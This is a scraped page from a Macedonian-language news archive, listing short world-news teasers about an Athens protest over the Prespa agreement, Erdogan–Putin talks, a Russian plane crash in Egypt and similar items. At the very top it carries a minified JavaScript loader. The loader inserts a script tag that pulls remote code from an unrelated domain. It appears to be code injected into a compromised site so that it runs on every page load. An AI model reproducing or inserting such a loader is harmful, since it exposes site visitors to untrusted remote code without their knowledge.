;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Свет Archives - Page 24 of 26 -

Протест пред парламентот во Атина/Запалено македонското знаме (Видео)

Неколку илјади демонстранти кои се против ратификацијата на договорот од Преспа, вечерва со грчки знамиња во рацете и со транспаренти „Македонија е грчка“ се собраа на повеќе локации во Атина. … Read More

Дали знаете кој е најскапиот град во светот?

Economist Intelligence Unit секоја година прави истражувања со цел да дознае кој е најскапиот град во светот. Веќе петта година по ред, Сингапур е на првото место на најскапи градови. Оваа … Read More

Средба Ердоган – Путин во Москва

Турскиот претседател Реџеп Тајип Ердоган и неговиот руски колега Владимир Путин денеска ќе ја одржат првата тет-а-тет средба во 2019 година, јави агенцијата Анадолија. За време на еднодневната работна посета … Read More

ГЕРМАНИЈА ЌЕ ГИ ЗАТВОРА ГРАНИЦИТЕ ЗА БАЛКАНОТ

Владата на Германија прави подготовки за затворање на границите за земјите од Балканот во претстојниов период, а ваквата дојава предизвика голема паника и страв кај бегалците , како и се … Read More

ПАРТИЈАТА НА ЕРДОГАН ГО ОСВОИ МНОЗИНСТВОТО ВО ТУРСКИОТ ПАРЛАМЕНТ

Исламската конзервативна Партија на правдата и развојот (АКП), чиј основач е турскиот претсeдател Реџеп Таип Ердоган, на вчерашните парламентарни избори освои апсолутно мнозинство во Големото народно собрание на Турција. Во … Read More

РУСКИ АВИОН СО НАД 200 ПАТНИЦИ СЕ УРНАЛ ВО ЕГИПЕТ

Руски патнички авион, што утрово полета од летувалиштето Шарм ел Шејк за Санкт Петербург, се урнал во централниот дел на Синај, потврди канцеларијата на египетскиот премиер, пренесуваат светските медиуми. Формиран … Read More